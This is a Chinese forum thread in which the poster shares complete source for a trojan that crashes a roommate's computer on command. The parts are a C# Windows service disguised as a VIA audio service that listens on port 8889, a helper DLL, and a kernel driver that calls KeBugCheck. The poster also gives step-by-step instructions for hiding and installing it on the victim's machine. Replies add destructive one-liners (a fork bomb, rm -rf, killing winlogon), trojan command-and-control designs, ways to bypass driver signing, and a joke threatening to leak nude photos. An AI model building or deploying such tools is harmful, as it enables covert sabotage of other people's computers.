室友打游戏 放音乐很烦人,还劝不听?怎么办!远程遥控计算机蓝屏~~~
张静茹2015/06/27软件综合 IP:北京


室友打游戏 放音乐很烦人,还劝不听?怎么办,继续往下看,让他在玩的最嗨的时候突然蓝屏~~~~


普通Ring3权限的软件不容易导致蓝屏,Ring0权限下就简单了,随便用指针乱指就行了
比如
int *p;
p = 0x100;
(*p) = 0x100;


在ring3全权限下执行你只会得到一个异常,ring0下执行就会蓝屏啦


解释一下什么时Ring0权限
Intel的x86处理器是通过Ring级别来进行访问控制的,级别共分4层,RING0,RING1,RING2,RING3。Windows只使用其中的两个级别RING0和RING3。RING0层拥有最高的权限,RING3层拥有最低的权限。按照Intel原有的构想,应用程序工作在RING3层,只能访问RING3层的数据,操作系统工作在RING0层,可以访问所有层的数据,而其他驱动程序位于RING1、RING2层,每一层只能访问本层以及权限更低层的数据。如果普通应用程序企图执行RING0指令,则Windows会显示“非法指令”错误信息。尽管有CPU的特权级别作保护,遗憾的是WINDOW98本身漏洞很多,使用Windows 98的系统一天死机n回也是正常的





程序注释已经非常详细了,我就不再多废话了


下面的是C#写的windows服务程序 服务程序挂载到系统之后,随系统自动启动
主要是创建Soctet通信,监听客户端连接,收到指令后启动蓝屏
程序流程基本就是从上到下执行的





<code class="lang-c">[DllImport("DriverAPI.dll")] //C++写的驱动控制函数 入口声明
public static extern UInt32 Blue_bottle();
 
 
private static byte[] result = new byte[1024];
private static int myProt = 8889;   //端口 
static Socket serverSocket;
protected override void OnStart(string[] args)/////       服务程序从此处开始!!!!!!
{
    string hostname = Dns.GetHostName();//得到本机名  
    IPHostEntry localhost = Dns.GetHostEntry(hostname);//得到本地所有ip地址
       
    foreach (IPAddress ServerIp in localhost.AddressList)//循环所有得到的ip地址
    {
        try//异常处理
        {
            serverSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);//创建一个Socket
            serverSocket.Bind(new IPEndPoint(ServerIp, myProt));  //绑定IP地址:端口  如果能绑定说明ip地址可用
            break;//跳出循环
        }
        catch (Exception)
        {//如果发生异常则代表ip地址不可用 测试下一个ip地址
 
        }
    }
    serverSocket.Listen(10);    //设定最多10个排队连接请求 
    Thread myThread = new Thread(ListenClientConnect);//创建一个新的线程监听客户端连接
    myThread.Start();//线程启动
}
 
 
/// <summary> 
/// 监听客户端连接 
/// </summary> 
private static void ListenClientConnect()
{
    while (true)
    {
        Socket clientSocket = serverSocket.Accept();//监听时会卡在这个函数中 直到有客户端链接
        clientSocket.Send(Encoding.Default.GetBytes("欢迎光临\r\n回复:\"哈药三精\"启动蓝瓶程序\r\n"));//给客户端发送消息
        Thread receiveThread = new Thread(ReceiveMessage);//初始化接收消息进程
        receiveThread.Start(clientSocket);//线程启动,并传进当前连接客户端的socket 
        //继续监听下一个客户端连接
    }
}
 
/// <summary> 
/// 接收消息 
/// </summary> 
/// <param name="clientSocket">已经连接的socket 
private static void ReceiveMessage(object clientSocket)
{
    Socket myClientSocket = (Socket)clientSocket;//当前连接客户端的socket
    while (true)
    {
        try
        {
            //通过clientSocket接收数据 
            int receiveNumber = myClientSocket.Receive(result); //接收客户端发来的消息 如果没有消息,就一直卡在这个函数里
 
            if (Encoding.Default.GetString(result, 0, receiveNumber).IndexOf("哈药三精") != -1)//查看是否有蓝屏指令
            {
                Blue_bottle();//启动蓝屏 这个还是用C++写的 因为C#封装winAPI太麻烦
            }
            else
            {
                myClientSocket.Send(Encoding.Default.GetBytes("回复:\"哈药三精\"启动蓝瓶程序\r\n"));
            }
 
            if (myClientSocket.Poll(1000, SelectMode.SelectRead))  //判断客户端是否可读
            {
                throw new Exception("链接已经断开");//抛出异常
            }
        }
        catch (Exception )//如果产生任何异常 有可能是客户端已经断开或者出现其他问题 则跳到这里开始执行
        {
            myClientSocket.Shutdown(SocketShutdown.Both);
            myClientSocket.Close();//关闭Socket连接 释放资源
            break; //跳出死循环 当前线程结束
        }
    }
}</code>








下面是用C++写的DriverAPI.Dll
当Blue_bottle被windows服务执行后,打开驱动设备,获得设备句柄,
WriteFile会触发驱动程序执行WDMWrite派遣函數







<code class="lang-c">#define DEVICE_NAME L"\\\\.\\HelloWDM"
void Write(HANDLE hDevice)
{
    if (hDevice != INVALID_HANDLE_VALUE)
    {
        int buffer[] = { 1111, 2222, 3333, 4444, 5555 };
        DWORD ret = 0;
        WriteFile(
            hDevice,//文件句柄
            buffer,//数据缓存区指针
            sizeof(buffer),//你要写的字节数
            &ret,//用于保存实际写入字节数的存储区域的指针
            NULL//OVERLAPPED结构体指针
            );
    }
}
extern "C" DLL_API unsigned int Blue_bottle(void) 
{
    HANDLE hDevice = CreateFile(DEVICE_NAME,//
        GENERIC_READ | GENERIC_WRITE, //访问模式(写 / 读)
        0,                            //共享模式 
        NULL,                         //指向安全属性的指针 
        OPEN_EXISTING,                //如何创建 
        FILE_ATTRIBUTE_NORMAL,        //文件属性 
        NULL);                        //用于复制文件句柄 
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        return GetLastError();
    }
    Write(hDevice);
    return 0;
}</code>







以下是驱动程序 具有Ring0权限

<code class="lang-c">NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, //驱动程序入口 类似main
IN PUNICODE_STRING pRegistryPath)
{
    DbgPrint("Enter DriverEntry\n");
    pDriverObject->DriverExtension->AddDevice = HelloWDMAddDevice;
    pDriverObject->MajorFunction[IRP_MJ_PNP] = HelloWDMPnp;
    pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] =
        pDriverObject->MajorFunction[IRP_MJ_CREATE] = HelloWDMDispatchRoutine;
    pDriverObject->MajorFunction[IRP_MJ_READ] = HelloWDMRead;
    pDriverObject->MajorFunction[IRP_MJ_WRITE] = WDMWrite;  //定义派遣函数  DriverAPI.dll中的Write会触发这个函数执行
    pDriverObject->DriverUnload = DriverUnload;
    DbgPrint("Leave DriverEntry\n");
    return STATUS_SUCCESS;
}
 
 
 
NTSTATUS WDMWrite(IN PDEVICE_OBJECT fdo, IN PIRP Irp) //DriverAPI.dll中的Write会触发这个函数执行
{
    DbgPrint("Enter HelloWDMWrite\n");
    __asm_int_3;
    NTSTATUS status = STATUS_SUCCESS;
    PDEVICE_EXTENSION pdx = (PDEVICE_EXTENSION)fdo->DeviceExtension;//获得设备扩展  
    PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);//获得irp信息  
 
    ULONG ulWrite = 0;//成功Write的字节数  
 
    ULONG ulLen = stack->Parameters.Write.Length;//获取caller想要write的字节数  
    ULONG ulOffset = (ULONG)stack->Parameters.Write.ByteOffset.QuadPart;//获取caller调用(WriteFile)的偏移量  
 
    int buffer[5] = { 0 };
    //  //把内容copy到驱动的缓冲里面。这里使用的是DO_BUFFERED_IO模式,那么可以从Irp->AssociatedIrp.SystemBuffer获取  
    //  //内核模式下的地址(系统会将用户模式的缓冲COPY到内核模式的缓冲Irp->AssociatedIrp.SystemBuffer)  
    RtlCopyMemory(buffer, Irp->AssociatedIrp.SystemBuffer, ulLen);//保存在驱动里面
    if (buffer[0] == 1111 && buffer[1] == 2222 && buffer[2] == 3333)
    {
        KeBugCheck(0x0000009C); //在Ring0权限下才可以执行,会导致蓝屏
    }
    status = STATUS_SUCCESS;
    ulWrite = ulLen;
 
 
    Irp->IoStatus.Status = status;               //设置IRP的完成状态(成功还是失败)  
    Irp->IoStatus.Information = ulWrite;     //驱动实际操作了多少字节  
    IoCompleteRequest(Irp, IO_NO_INCREMENT);    //结束IRP,无需往下面的驱动传递  
 
    DbgPrint("Leave HelloWDMWrite, write: %d bytes, offset: %d, input len: %d\n", ulWrite, ulOffset, ulWrite);
    return status;
}</code>
来自:计算机科学 / 软件综合
49
已屏蔽 原因:{{ notice.reason }}已屏蔽
{{notice.noticeContent}}
~~空空如也
starpeng
9年6个月前 IP:广东
775436
沙发呀!坐起!
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 IP:北京
775437
引用 starpeng:
沙发呀!坐起!
非茶话区灌水会被扣分哦
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
黑暗死宅男
9年6个月前 IP:广西
775442
怎么用
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 修改于 9年6个月前 IP:北京
775444
引用 黑暗死宅男:
怎么用
全部编译出来 驱动和服务都挂载到系统,然后在内网用socket客户端连接过来,服务器地址时受害机的IP地址,然后给服务器发"哈药三精"  服务器就蓝屏了






将整个程序包放到C:\windows\System32\*下随便建一个文件夹或者放在某个已有的目录
DriverAPI.dll C++写的驱动通信接口 封装的winapi C#服务通过他与驱动通信
XXXXXXf  
XXXXXXs 驱动程序 Ring0权限 可以执行蓝屏
InstallUtil.exe  .net服务挂载器
VIAAudioServices.exe 伪装成威盛声卡服务的 windows服务 Windows 服务能够创建在它们自己的 Windows 会话中可长时间运行的可执行应用程序。这些服务可以在计算机启动时自动启动,可以暂停和重新启动而且不显示任何用户界面。
WdfCoinstaller01011.dll 驱动安装所必须的

挂载驱动:
打开设备管理器 添加过时硬件



下一步 安装我手动从列表选择的硬件(高级) 下一步 显示所有设备 下一步 从磁盘安装

浏览 定位到 XXXXXXf (目录下必须还有XXXXXXs , WdfCoinstaller01011.dll) 打开 确定 下一步
下一步  始终安装此驱动程序软件 (360会有警告 选择允许) 完成
    
安装服务:
CMD命令: 必须以管理员权限运行 CMD
挂载服务命令: C:\Windows\System32\0409\installutil.exe C:\Windows\System32\0409\VIAAudioServices.exe
.net服务挂载工具 exe后有一个空格↑↑ 服务所在路径,最好在Csystem32下    ↑
(360可能有提示 允许即可)
安装成功
卸载服务

C:\Windows\System32\0409\installutil.exe /u C:\Windows\System32\0409\VIAAudioServices.exe

卸载成功


此时服务还未启动 而且,不能与外网通信
打开控制面板 搜索防火墙 允许应用通过windows防火墙进行通信 更改设置
允许其他应用  添加C:\Windows\System32\0409\VIAAudioServices.exe 添加 网络类型 公用专用都勾上








挂载好服务之后打开任务管理器或者服务管理器  右键启动


就能看到服务进程了,这个服务会在系统启动的时候无声无息的自动启动

此时 打开socket客户端 服务器IP就是你室友的IP 端口是8889
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 IP:北京
775459
@smith
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
Johnny-Wei
9年6个月前 IP:广东
775472
这样攻击别人的计算机,是非法行为哦
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
wenjizu
9年6个月前 IP:广东
775474
估计要被封号,科创币都给你了
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
wangrui555
9年6个月前 IP:上海
775483
不要这样,这样做是违法的。大家一个宿舍的有事好商量,坐下来好好谈谈,微笑的面对她,含蓄的威胁她,再放音乐就在网上发她裸照!。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 IP:北京
775484
引用 Johnny-Wei:
这样攻击别人的计算机,是非法行为哦
合成炸药也是违法的
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
cccyl
9年6个月前 IP:浙江
775501
在路由里设置他的网速为上行1kb下行1kb就行了,没经验的一个月都找不到原因
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
甘露醇六硝酸酯
9年6个月前 IP:浙江
775507
引用 张静茹:
合成炸药也是违法的
能材,我们是化学爱好者
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
航模发烧友
9年6个月前 IP:广东
775566
引用 甘露醇六硝酸酯:
能材,我们是化学爱好者
我们是黑客爱好者[s::lol]
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
Johnny-Wei
9年6个月前 IP:广东
775574
引用 张静茹:
合成炸药也是违法的
那要看量,有些炸药属于多用途产品,不超量就没事
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith
9年6个月前 IP:广东
775581
winxp下可以,win7或者win8估计不行了,因为限制了驱动加载,除非能搞到驱动签名,就像进攻卡巴斯基的APT组织那样偷到了富士康的签名。

其实可以考虑大量新建进程和分配内存的方法消耗系统资源,在linux下,这叫fork炸弹,像这样的脚本服务器运行了:


:(){ :|:& };:




结果只能重启系统没有办法[s::lol]
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith
9年6个月前 IP:广东
775584
妹子研究驱动不错嘛,可以考虑更深入一些,挖掘一些内核溢出的漏洞,不管是windows、linux、mac、android,这些漏洞一旦找到了就是价值千金。
在苹果手机系统上,找到了这些漏洞加以利用,就可以越狱。目前国内的安全组织,如360、百度、腾讯都在资助一些越狱团队发掘漏洞,这些越狱工具往往是捆绑百度、腾讯、360服务的好工具。


windows、linux下的内核溢出可以用于提权,如果是远程溢出的话,更是致命的,国家甚至会把这种漏洞当做战略储备。因为这个世界上使用这两种系统的服务器不能太多。


android的内核层是linux,但体系通常是ARM,发掘Android的内核或者系统层的漏洞也很重要,一部分一键root工具就是这样搞的。root了之后用户会有更大的权限。使用也更为自由。


介绍一个介绍溢出漏洞的网站:

XXXXXXXXXXXXXXXXXX


这个是国外组织维护的系统漏洞数据库,在这里可以查询大部分系统的漏洞和利用程序,从windows到iphone再到Android
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith
9年6个月前 IP:广东
775586
妹子这个思路基本上是木马的经典模型。不过如果需要穿透局域网的话,就有难度了。

一是考虑反弹木马,也就是你的机器作为服务端侦听端口,被控的机器作为客户端,这样可以只要你的电脑连接在公网上就行了。但大家的IP都是电信动态分配的IP,就需要动态域名解析的服务,常见的服务提供方有花生壳这类的服务商

二是可以考虑P2P打洞技术,市面上的向日葵远控就是基于这一类技术,顺便说一下这个向日葵远控已经洗白了,不算黑客软件,这个方法不需要动态域名解析,但缺点有两个,也就是还是需要一台服务器作为协助两边P2P打洞的服务器,打洞完成后这个服务器可以不用,而是端口转发也会受路由器影响。

三是可以考虑服务器中介,也就是搞一台公网服务器作为中转,两边都使用80端口连接服务器,看上去就像正常网络访问一样,这个效率低,不适合屏幕传输之类的应用,但是实用性和可靠性比上面两种都要好。2011年~2012年肆虐全球的zeus病毒就是这样的原理。感染了这个病毒的机器会自动到黑阔的服务器上注册,并发送心跳包显示存在,然后黑阔登陆服务器后可以查看每一台计算机的状态,短短半年的时间,被感染的机器超过千万台
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 IP:北京
775602
引用 smith:
妹子这个思路基本上是木马的经典模型。不过如果需要穿透局域网的话,就有难度了。

一是考虑反弹木马,也就是你的机器作为服务端侦听端口,被控的机器作为客户端,这样可以只要你的电脑连接在公网上就行了。但大家的IP都是电信动态分配的IP,就需要动态...
哇哦 感谢肯定
如果穿透局域网的话 可以让被害机作为客户端 连接别人送给我的服务器

win7不签名的驱动好像只是提示 你硬要装的话,也是能装上的
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 IP:北京
775603
引用 smith:
妹子研究驱动不错嘛,可以考虑更深入一些,挖掘一些内核溢出的漏洞,不管是windows、linux、mac、android,这些漏洞一旦找到了就是价值千金。
在苹果手机系统上,找到了这些漏洞加以利用,就可以越狱。目前国内的安全组织,如360...
驱动刚入门,驱动下的API大多都不会用,看了些驱动方面的书,讲的内核API很少,有什么推荐吗?
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
smith
9年6个月前 IP:广东
775621
引用 张静茹:
驱动刚入门,驱动下的API大多都不会用,看了些驱动方面的书,讲的内核API很少,有什么推荐吗?
说句实话因为工作的原因我对windows平台研究不多,驱动的话有国内有一本 寒江独钓windows内核编程与信息安全写得不错,这本书的电子版在网盘可以下载。可以翻来看一看。
msdn是更直接的学习方法。但msdn偏重于工程性,也就不会告诉你一些驱动安全方面的技巧。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
acmilan
9年6个月前 IP:四川
775627
这相当于编写了一个木马→_→
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
acmilan
9年6个月前 IP:四川
775638
c++编写服务没有c#方便。。。还是c#最爽(其实可以直接用srvany注册普通exe为服务的)
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 IP:北京
775639
引用 acmilan:
c++编写服务没有c#方便。。。还是c#最爽(其实可以直接用srvany注册普通exe为服务的)
对 有次命令打错了吧服务挂载工具给挂载到服务了 居然成功了  也没报错 但是普通exe注册为服务能正常运行吗?
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
acmilan
9年6个月前 IP:四川
775641
引用 张静茹:
对 有次命令打错了吧服务挂载工具给挂载到服务了 居然成功了  也没报错 但是普通exe注册为服务能正常运行吗?
显然不能,启动时会卡住
因此用C++需要用WinAPI来注册服务,然后退出main函数,让系统执行ServiceMain函数。
所以普通exe注册为服务需要用srvany这个工具,这个工具实现了注册服务+服务运行时调用exe的功能。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 IP:北京
775650
引用 acmilan:
显然不能,启动时会卡住
因此用C++需要用WinAPI来注册服务,然后退出main函数,让系统执行ServiceMain函数。
所以普通exe注册为服务需要用srvany这个工具,这个工具实现了注册服务+服务运行时调用exe的功能。
哦哦 酱紫
我的驱动再设备管理器安装完毕之后 设备类是 示例 改了inf文件里的class 和classname都没有用,您知道在哪改吗?
还有 再vs里新建一个驱动项目 就会出来俩项目 一个名字为* 另一个是* Package,这个*Package编译会报错,但是再属性管理器中添加属性表就能编译通过了,会出现可以用的sys文件和协助安装的一个dll,除此之外这个多余的项目还有什么用?
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
acmilan
9年6个月前 IP:四川
775651
引用 张静茹:
哦哦 酱紫
我的驱动再设备管理器安装完毕之后 设备类是 示例 改了inf文件里的class 和classname都没有用,您知道在哪改吗?
还有 再vs里新建一个驱动项目 就会出来俩项目 一个名字为* 另一个是* Package,这个*P...
可能还需要换一个ClassGUID
资料:XXXXXXXXXXXXXXXXXXXXXXXXXX/en-us/library/windows/hardware/ff553426%28v=vs.85%XXXXXpx
那个package工程的作用可能是进行打包和数字签名
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
acmilan
9年6个月前 IP:四川
775658
尽管有CPU的特权级别作保护,遗憾的是WINDOW98本身漏洞很多,使用Windows 98的系统一天死机n回也是正常的  
现在谁还用win98→_→
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年6个月前 IP:北京
775676
引用 acmilan:
可能还需要换一个ClassGUID
资料:XXXXXXXXXXXXXXXXXXXXXXXXXX/en-us/library/windows/hardware/ff553426%28v=vs.85%XXXXXpx
那个package工程的...
OK 我试试
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
wenyanwen
9年6个月前 IP:上海
775678
太牛了!
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
acmilan
9年6个月前 IP:四川
775889
引用 smith:
winxp下可以,win7或者win8估计不行了,因为限制了驱动加载,除非能搞到驱动签名,就像进攻卡巴斯基的APT组织那样偷到了富士康的签名。

其实可以考虑大量新建进程和分配内存的方法消耗系统资源,在linux下,这叫fork炸弹,像...
搞到root的话,直接kill 1就可以死机了,当然狠一点也可以rm -rf根目录和dd硬盘[s:20]xp下想蓝屏也可以ntsd -c q -pn winlogon.exe
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
最高主机泡泡
9年6个月前 IP:天津
775946
记得之前从卡吧弄了好几个这类的软件,挂到电脑里面就能禁止一些游戏程序运行,限制网速或者自动关机啥的。。
小学生杀手啊,熊孩子杀手之类的一些软件
其实用路由器直接限速是个比较损但也不容易发现的方法。。还有一些网管软件比如P2P终结者之流
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
北落师门
9年6个月前 IP:浙江
776054
大学的时候室友都抽烟...我表示要抽去阳台抽去,然后就乖乖去阳台抽烟了....冬天也这样,大概怕我不高兴在他们水里不小心放点什么东西吧...所以,玩点化学是有必要的
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
acmilan
9年6个月前 IP:四川
776346
引用 北落师门:
大学的时候室友都抽烟...我表示要抽去阳台抽去,然后就乖乖去阳台抽烟了....冬天也这样,大概怕我不高兴在他们水里不小心放点什么东西吧...所以,玩点化学是有必要的
这种还要看室友的悟性,懂的话也就心照不宣了,不懂的暗示一下秒懂也好,最怕那些思想单纯,怎么点都点不通的,得说到让他激动才能解决问题,碰上了就倒了八辈子霉了→_→
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
闲的蛋疼
9年6个月前 IP:江苏
776399
明人不做暗,让他用耳机不就行了
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
暗夜幽灵
9年5个月前 IP:黑龙江
781871
引用 张静茹:
哇哦 感谢肯定
如果穿透局域网的话 可以让被害机作为客户端 连接别人送给我的服务器

win7不签名的驱动好像只是提示 你硬要装的话,也是能装上的
win7 32位你的确可以装上并运行,win7 64位安装没问题,但是服务打不开,除非你改他启动选项把默认开启的强制驱动签名给关了.
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
张静茹作者
9年5个月前 IP:天津
781904
引用 暗夜幽灵:
win7 32位你的确可以装上并运行,win7 64位安装没问题,但是服务打不开,除非你改他启动选项把默认开启的强制驱动签名给关了.
msconfig 改掉启动选项,一般人根本不会改回来
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
暗夜幽灵
9年5个月前 IP:黑龙江
782150
引用 张静茹:
msconfig 改掉启动选项,一般人根本不会改回来
msconfig里没有这个选项,只能用XXXXXXXXXXconfig里倒有个开调试的选项,只不过打开了它腾讯游戏必蓝屏.
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
那抹余辉
9年5个月前 IP:浙江
783086
引用 张静茹:
msconfig 改掉启动选项,一般人根本不会改回来
win8.1运行msconfig,启动标签中会提示打开任务管理器
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
那抹余辉
9年5个月前 IP:浙江
783087
引用 smith:
说句实话因为工作的原因我对windows平台研究不多,驱动的话有国内有一本 寒江独钓windows内核编程与信息安全写得不错,这本书的电子版在网盘可以下载。可以翻来看一看。
msdn是更直接的学习方法。但msdn偏重于工程性,也就不会告诉你...
专业人士[s::lol]显然大学的专业是计算机或软工
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
放牛党主席
9年5个月前 IP:广东
783088
叫他用耳机咯,第二步剪网线
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
KC-53990
9年5个月前 IP:广西
783142
耳机是终极方案
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
adj1202
9年1个月前 IP:广西
799830
楼主应该拿一个电源适配器或者排插,把里面价格遥控器,里面有个电阻和地线相接,通过遥控器控制电阻接通,等玩得很HI的时候,接通后漏电保护器就,啪的一声跳闸了,整个宿舍停电,清净了。
这样应该不违法吧
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
usafn6132
9年1个月前 IP:北京
799849
虎哥这时候一般会说:“建议肢体教育”
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
sunny900
9年1个月前 IP:广东
799906
引用 adj1202:
楼主应该拿一个电源适配器或者排插,把里面价格遥控器,里面有个电阻和地线相接,通过遥控器控制电阻接通,等玩得很HI的时候,接通后漏电保护器就,啪的一声跳闸了,整个宿舍停电,清净了。
这样应该不违法吧
在插排里面安装一个WIFI电源开关主板(如小米智能插座),手机遥控开关,时不时给室友来个惊喜。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
ARRYBOOM
8年7个月前 IP:浙江
819703
大学宿舍这么多年都是交换机局域网嘛,各种wireshark
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
strange
8年2个月前 IP:广东
826842
话说搞zhem这么复杂干嘛,shutdown -r -t 3不就可以了嘛
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
1139872424
8年1个月前 IP:广东
827664
趁他不在,拆开机箱,在主板上边,重启或者启动的那个跳线焊接个小型遥控模块,模块的电源嘛,刚好,电脑机箱电源就有12V或者5V的。说不听,就等他玩到关机时刻,用遥控帮他重启一下,还不听就直接长按关机,哈哈。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
迷狼
7年10个月前 IP:江西
830702
这里高手真多
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
fournoas
7年10个月前 IP:美国
830927
好久没写windows程序了

我记得2000/XP下有个Native API:LoadDriver,直接可以加载驱动
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论

想参与大家的讨论?现在就 登录 或者 注册

所属专业
所属分类
上级专业
同级专业
张静茹
进士 学者 机友 笔友
文章
139
回复
1869
学术分
1
2010/12/30注册,1个月25天前活动
暂无简介
主体类型:个人
所属领域:无
认证方式:手机号
IP归属地:未同步
文件下载
加载中...
{{errorInfo}}
{{downloadWarning}}
你在 {{downloadTime}} 下载过当前文件。
文件名称:{{resource.defaultFile.name}}
下载次数:{{resource.hits}}
上传用户:{{uploader.username}}
所需积分:{{costScores}},{{holdScores}}下载当前附件免费{{description}}
积分不足,去充值
文件已丢失

当前账号的附件下载数量限制如下:
时段 个数
{{f.startingTime}}点 - {{f.endTime}}点 {{f.fileCount}}
视频暂不能访问,请登录试试
仅供内部学术交流或培训使用,请先保存到本地。本内容不代表科创观点,未经原作者同意,请勿转载。
音频暂不能访问,请登录试试
支持的图片格式:jpg, jpeg, png
插入公式
评论控制
加载中...
文号:{{pid}}
投诉或举报
加载中...
{{tip}}
请选择违规类型:
{{reason.type}}

空空如也

加载中...
详情
详情
推送到专栏从专栏移除
设为匿名取消匿名
查看作者
回复
只看作者
加入收藏取消收藏
收藏
取消收藏
折叠回复
置顶取消置顶
评学术分
鼓励
设为精选取消精选
管理提醒
编辑
通过审核
评论控制
退修或删除
历史版本
违规记录
投诉或举报
加入黑名单移除黑名单
查看IP
{{format('YYYY/MM/DD HH:mm:ss', toc)}}